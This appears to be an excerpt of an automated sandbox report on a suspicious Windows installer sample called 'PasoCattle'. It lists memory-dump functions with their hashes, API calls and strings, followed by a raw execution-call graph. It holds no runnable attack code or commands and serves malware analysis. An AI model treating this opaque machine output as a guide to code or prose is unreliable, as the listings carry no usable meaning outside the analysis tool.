                                                                                                                                                                          • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                          • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                          • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2883127279-0
                                                                                                                                                                          • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                          • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                          • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                          • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                          • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                          • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                          • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                          • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                          • String ID: !N~
                                                                                                                                                                          • API String ID: 623250636-529124213
                                                                                                                                                                          • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                          • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                          • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                          • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                          Strings
                                                                                                                                                                          • Error launching installer, xrefs: 00405C74
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                          • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                          • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                          • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                          • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                            • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                          • API String ID: 3509786178-2769509956
                                                                                                                                                                          • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                          • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                          • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                          • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                          • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                          • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                          • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                          • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                          • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:3.1%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0.9%
                                                                                                                                                                          Signature Coverage:4.3%
                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                          Total number of Limit Nodes:60
                                                                                                                                                                          execution_graph 102836 a61044 102841 a62793 102836->102841 102838 a6104a 102877 a80413 29 API calls __onexit 102838->102877 102840 a61054 102878 a62a38 102841->102878 102845 a6280a 102888 a6bf73 102845->102888 102848 a6bf73 8 API calls 102849 a6281e 102848->102849 102850 a6bf73 8 API calls 102849->102850 102851 a62828 102850->102851 102852 a6bf73 8 API calls 102851->102852 102853 a62866 102852->102853 102854 a6bf73 8 API calls 102853->102854 102855 a62932 102854->102855 102893 a62dbc 102855->102893 102859 a62964 102860 a6bf73 8 API calls 102859->102860 102861 a6296e 102860->102861 102920 a73160 102861->102920 102863 a62999 102930 a63166 102863->102930 102865 a629b5 102866 a629c5 GetStdHandle 102865->102866 102867 a62a1a 102866->102867 102868 aa39e7 102866->102868 102871 a62a27 OleInitialize 102867->102871 102868->102867 102869 aa39f0 102868->102869 102937 a8014b 102869->102937 102871->102838 102872 aa39f7 102946 ad0ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 102872->102946 102874 aa3a00 102947 ad12eb CreateThread 102874->102947 102876 aa3a0c CloseHandle 102876->102867 102877->102840 102948 a62a91 102878->102948 102881 a62a91 8 API calls 102882 a62a70 102881->102882 102883 a6bf73 8 API calls 102882->102883 102884 a62a7c 102883->102884 102955 a68577 102884->102955 102886 a627c9 102887 a6327e 6 API calls 102886->102887 102887->102845 102889 a8017b 8 API calls 102888->102889 102890 a6bf88 102889->102890 102891 a8014b 8 API calls 102890->102891 102892 a62814 102891->102892 102892->102848 102894 a6bf73 8 API calls 102893->102894 102895 a62dcc 102894->102895 102896 a6bf73 8 API calls 102895->102896 102897 a62dd4 102896->102897 102990 a681d6 102897->102990 102900 a681d6 8 API calls 102901 a62de4 102900->102901 102902 a6bf73 8 API calls 102901->102902 102903 a62def 102902->102903 102904 a8014b 8 API calls 102903->102904 102905 a6293c 102904->102905 102906 a63205 102905->102906 102907 a63213 102906->102907 102908 a6bf73 8 API calls 102907->102908 102909 a6321e 102908->102909 102910 a6bf73 8 API calls 102909->102910 102911 a63229 102910->102911 102912 a6bf73 8 API calls 102911->102912 102913 a63234 102912->102913 102914 a6bf73 8 API calls 102913->102914 102915 a6323f 102914->102915 102916 a681d6 8 API calls 102915->102916 102917 a6324a 102916->102917 102918 a8014b 8 API calls 102917->102918 102919 a63251 RegisterWindowMessageW 102918->102919 102919->102859 102921 a731a1 102920->102921 102924 a7317d 102920->102924 102993 a805b2 5 API calls __Init_thread_wait 102921->102993 102923 a7318e 102923->102863 102924->102923 102995 a805b2 5 API calls __Init_thread_wait 102924->102995 102925 a731ab 102925->102924 102994 a80568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102925->102994 102927 a79f47 102927->102923 102996 a80568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102927->102996 102931 a63176 102930->102931 102932 aa3c8f 102930->102932 102933 a8014b 8 API calls 102931->102933 102997 ad3c4e 8 API calls 102932->102997 102935 a6317e 102933->102935 102935->102865 102936 aa3c9a 102939 a80150 ___std_exception_copy 102937->102939 102938 a8016a 102938->102872 102939->102938 102942 a8016c 102939->102942 102998 a8521d 7 API calls 2 library calls 102939->102998 102941 a809dd 103000 a83614 RaiseException 102941->103000 102942->102941 102999 a83614 RaiseException 102942->102999 102944 a809fa 102944->102872 102946->102874 102947->102876 103001 ad12d1 14 API calls 102947->103001 102949 a6bf73 8 API calls 102948->102949 102950 a62a9c 102949->102950 102951 a6bf73 8 API calls 102950->102951 102952 a62aa4 102951->102952 102953 a6bf73 8 API calls 102952->102953 102954 a62a66 102953->102954 102954->102881 102956 a68587 _wcslen 102955->102956 102957 aa6610 102955->102957 102960 a685c2 102956->102960 102961 a6859d 102956->102961 102977 a6adf4 102957->102977 102959 aa6619 102959->102959 102963 a8014b 8 API calls 102960->102963 102967 a688e8 8 API calls 102961->102967 102964 a685ce 102963->102964 102968 a8017b 102964->102968 102965 a685a5 __fread_nolock 102965->102886 102967->102965 102969 a8014b ___std_exception_copy 102968->102969 102970 a8016a 102969->102970 102973 a8016c 102969->102973 102981 a8521d 7 API calls 2 library calls 102969->102981 102970->102965 102972 a809dd 102983 a83614 RaiseException 102972->102983 102973->102972 102982 a83614 RaiseException 102973->102982 102975 a809fa 102975->102965 102978 a6ae02 102977->102978 102980 a6ae0b __fread_nolock 102977->102980 102978->102980 102984 a6c2c9 102978->102984 102980->102959 102981->102969 102982->102972 102983->102975 102985 a6c2dc 102984->102985 102986 a6c2d9 __fread_nolock 102984->102986 102987 a8014b 8 API calls 102985->102987 102986->102980 102988 a6c2e7 102987->102988 102989 a8017b 8 API calls 102988->102989 102989->102986 102991 a6bf73 8 API calls 102990->102991 102992 a62ddc 102991->102992 102992->102900 102993->102925 102994->102924 102995->102927 102996->102923 102997->102936 102998->102939 102999->102941 103000->102944 103002 a6f5e5 103005 a6cab0 103002->103005 103006 a6cacb 103005->103006 103007 ab14be 103006->103007 103008 ab150c 103006->103008 103035 a6caf0 103006->103035 103011 ab14c8 103007->103011 103014 ab14d5 103007->103014 103007->103035 103077 ae62ff 207 API calls 2 library calls 103008->103077 103075 ae6790 207 API calls 103011->103075 103028 a6cdc0 103014->103028 103076 ae6c2d 207 API calls 2 library calls 103014->103076 103018 a6cf80 39 API calls 103018->103035 103019 a7e807 39 API calls 103019->103035 103020 ab179f 103020->103020 103022 a6cdee 103024 ab16e8 103084 ae6669 81 API calls 103024->103084 103028->103022 103085 ad3fe1 81 API calls __wsopen_s 103028->103085 103035->103018 103035->103019 103035->103022 103035->103024 103035->103028 103036 a70340 103035->103036 103059 a6be2d 103035->103059 103063 a7e7c1 39 API calls 103035->103063 103064 a7aa99 207 API calls 103035->103064 103065 a805b2 5 API calls __Init_thread_wait 103035->103065 103066 a7bc58 103035->103066 103071 a80413 29 API calls __onexit 103035->103071 103072 a80568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103035->103072 103073 a7f4df 81 API calls 103035->103073 103074 a7f346 207 API calls 103035->103074 103078 a6b4c8 8 API calls 103035->103078 103079 abffaf 8 API calls 103035->103079 103080 a6bed9 103035->103080 103038 a70376 ISource 103036->103038 103037 a80413 29 API calls pre_c_initialization 103037->103038 103038->103037 103039 ab632b 103038->103039 103040 a71695 103038->103040 103043 a7049d ISource 103038->103043 103044 a8014b 8 API calls 103038->103044 103045 ab5cdb 103038->103045 103046 ab625a 103038->103046 103050 a6bed9 8 API calls 103038->103050 103053 a805b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103038->103053 103054 a6bf73 8 API calls 103038->103054 103055 a80568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103038->103055 103056 ab6115 103038->103056 103057 a70aae ISource 103038->103057 103086 a71990 103038->103086 103148 a71e50 103038->103148 103161 ad3fe1 81 API calls __wsopen_s 103039->103161 103040->103043 103049 a6bed9 8 API calls 103040->103049 103043->103035 103044->103038 103045->103043 103052 a6bed9 8 API calls 103045->103052 103160 ad3fe1 81 API calls __wsopen_s 103046->103160 103049->103043 103050->103038 103052->103043 103053->103038 103054->103038 103055->103038 103158 ad3fe1 81 API calls __wsopen_s 103056->103158 103159 ad3fe1 81 API calls __wsopen_s 103057->103159 103060 a6be38 103059->103060 103061 a6be67 103060->103061 103901 a6bfa5 39 API calls 103060->103901 103061->103035 103063->103035 103064->103035 103065->103035 103067 a8014b 8 API calls 103066->103067 103068 a7bc65 103067->103068 103069 a6b329 8 API calls 103068->103069 103070 a7bc70 103069->103070 103070->103035 103071->103035 103072->103035 103073->103035 103074->103035 103075->103014 103076->103028 103077->103035 103078->103035 103079->103035 103081 a6befc __fread_nolock 103080->103081 103082 a6beed 103080->103082 103081->103035 103082->103081 103083 a8017b 8 API calls 103082->103083 103083->103081 103084->103028 103085->103020 103087 a719b6 103086->103087 103088 a71a2e 103086->103088 103090 ab6b60 103087->103090 103091 a719c3 103087->103091 103089 ab6a4d 103088->103089 103106 a71a3d 103088->103106 103093 ab6a58 103089->103093 103094 ab6b54 103089->103094 103168 ae85db 207 API calls 2 library calls 103090->103168 103099 ab6b84 103091->103099 103100 a719cd 103091->103100 103166 a7b35c 207 API calls 103093->103166 103167 ad3fe1 81 API calls __wsopen_s 103094->103167 103095 a70340 207 API calls 103095->103106 103098 ab6bb5 103101 ab6be2 103098->103101 103102 ab6bc0 103098->103102 103099->103098 103105 ab6b9c 103099->103105 103104 a6bed9 8 API calls 103100->103104 103147 a719e0 ISource 103100->103147 103171 ae60e6 103101->103171 103170 ae85db 207 API calls 2 library calls 103102->103170 103103 a71bb5 103103->103038 103104->103147 103169 ad3fe1 81 API calls __wsopen_s 103105->103169 103106->103095 103106->103103 103107 ab6979 103106->103107 103112 ab6908 103106->103112 103125 a71ba9 103106->103125 103131 a71af4 103106->103131 103106->103147 103165 ad3fe1 81 API calls __wsopen_s 103107->103165 103164 ad3fe1 81 API calls __wsopen_s 103112->103164 103113 ab6dd9 103116 ab6e0f 103113->103116 103268 ae81ce 65 API calls 103113->103268 103270 a6b4c8 8 API calls 103116->103270 103118 ab6c81 103241 ad1ad8 8 API calls 103118->103241 103121 a6bed9 8 API calls 103121->103147 103122 ab6db7 103244 a68ec0 103122->103244 103124 ab6ded 103127 a68ec0 52 API calls 103124->103127 103125->103103 103163 ad3fe1 81 API calls __wsopen_s 103125->103163 103126 ab6c08 103178 ad148b 103126->103178 103142 ab6df5 _wcslen 103127->103142 103130 ab6c93 103242 a6bd07 8 API calls 103130->103242 103131->103125 103162 a71ca0 8 API calls 103131->103162 103135 a71b55 103135->103125 103143 a71b62 ISource 103135->103143 103136 ab691d ISource 103136->103107 103136->103143 103146 a71a23 ISource 103136->103146 103137 ab6dbf _wcslen 103137->103113 103267 a6b4c8 8 API calls 103137->103267 103139 ab6c9c 103145 ad148b 8 API calls 103139->103145 103142->103116 103269 a6b4c8 8 API calls 103142->103269 103143->103121 103143->103146 103143->103147 103145->103147 103146->103038 103147->103113 103147->103146 103243 ae808f 53 API calls __wsopen_s 103147->103243 103155 a71e6d ISource 103148->103155 103149 a72512 103151 a71ff7 ISource 103149->103151 103900 a7be08 39 API calls 103149->103900 103151->103038 103153 ab7837 103153->103151 103899 a8d2d5 39 API calls 103153->103899 103155->103149 103155->103151 103155->103153 103157 ab766b 103155->103157 103898 a7e322 8 API calls ISource 103155->103898 103897 a8d2d5 39 API calls 103157->103897 103158->103057 103159->103043 103160->103043 103161->103043 103162->103135 103163->103146 103164->103136 103165->103147 103166->103143 103167->103090 103168->103147 103169->103146 103170->103147 103172 ae6101 103171->103172 103173 ab6bed 103171->103173 103174 a8017b 8 API calls 103172->103174 103173->103118 103173->103126 103176 ae6123 103174->103176 103175 a8014b 8 API calls 103175->103176 103176->103173 103176->103175 103271 ad1400 8 API calls 103176->103271 103179 ab6c32 103178->103179 103180 ad1499 103178->103180 103182 a72b20 103179->103182 103180->103179 103181 a8014b 8 API calls 103180->103181 103181->103179 103183 a72b61 103182->103183 103184 a72b86 103183->103184 103185 a72fc0 103183->103185 103186 ab7bd8 103184->103186 103187 a72ba0 103184->103187 103394 a805b2 5 API calls __Init_thread_wait 103185->103394 103357 ae7af9 103186->103357 103189 a73160 9 API calls 103187->103189 103192 a72bb0 103189->103192 103191 a72fca 103199 a7300b 103191->103199 103395 a6b329 103191->103395 103194 a73160 9 API calls 103192->103194 103193 ab7be4 103193->103147 103196 a72bc6 103194->103196 103198 a72bfc 103196->103198 103196->103199 103197 ab7bed 103197->103147 103200 ab7bfd 103198->103200 103223 a72c18 __fread_nolock 103198->103223 103199->103197 103402 a6b4c8 8 API calls 103199->103402 103405 ad3fe1 81 API calls __wsopen_s 103200->103405 103203 a73049 103403 a7e6e8 207 API calls 103203->103403 103204 a72fe4 103401 a80568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103204->103401 103207 ab7c15 103406 ad3fe1 81 API calls __wsopen_s 103207->103406 103208 a72d3f 103210 ab7c78 103208->103210 103211 a72d4c 103208->103211 103408 ae61a2 53 API calls _wcslen 103210->103408 103212 a73160 9 API calls 103211->103212 103214 a72d59 103212->103214 103220 a73160 9 API calls 103214->103220 103229 a72dd7 ISource 103214->103229 103215 a8014b 8 API calls 103215->103223 103216 a8017b 8 API calls 103216->103223 103217 a73082 103404 a7fe39 8 API calls 103217->103404 103219 a72f2d 103219->103147 103227 a72d73 103220->103227 103222 a70340 207 API calls 103222->103223 103223->103203 103223->103207 103223->103208 103223->103215 103223->103216 103223->103222 103224 ab7c59 103223->103224 103223->103229 103407 ad3fe1 81 API calls __wsopen_s 103224->103407 103225 a73160 9 API calls 103225->103229 103227->103229 103231 a6bed9 8 API calls 103227->103231 103229->103217 103229->103225 103230 a72e8b ISource 103229->103230 103272 ae9ffc 103229->103272 103275 a7ac3e 103229->103275 103294 aea5b2 103229->103294 103300 aea9ac 103229->103300 103308 adf94a 103229->103308 103317 ad664c 103229->103317 103324 ae9fe8 103229->103324 103327 ae0fb8 103229->103327 103352 aead47 103229->103352 103409 ad3fe1 81 API calls __wsopen_s 103229->103409 103230->103219 103393 a7e322 8 API calls ISource 103230->103393 103231->103229 103241->103130 103242->103139 103243->103122 103245 a68ed5 103244->103245 103246 a68ed2 103244->103246 103247 a68edd 103245->103247 103248 a68f0b 103245->103248 103246->103137 103893 a85536 26 API calls 103247->103893 103249 aa6b1f 103248->103249 103253 a68f1d 103248->103253 103259 aa6a38 103248->103259 103896 a854f3 26 API calls 103249->103896 103251 a68eed 103256 a8014b 8 API calls 103251->103256 103894 a7fe6f 51 API calls 103253->103894 103254 aa6b37 103254->103254 103258 a68ef7 103256->103258 103260 a6b329 8 API calls 103258->103260 103261 aa6ab1 103259->103261 103262 a8017b 8 API calls 103259->103262 103260->103246 103895 a7fe6f 51 API calls 103261->103895 103263 aa6a81 103262->103263 103264 a8014b 8 API calls 103263->103264 103265 aa6aa8 103264->103265 103266 a6b329 8 API calls 103265->103266 103266->103261 103267->103113 103268->103124 103269->103116 103270->103146 103271->103176 103410 ae89b6 103272->103410 103274 aea00c 103274->103229 103276 a68ec0 52 API calls 103275->103276 103277 a7ac68 103276->103277 103278 a7bc58 8 API calls 103277->103278 103279 a7ac7f 103278->103279 103290 a7b09b _wcslen 103279->103290 103550 a6c98d 39 API calls 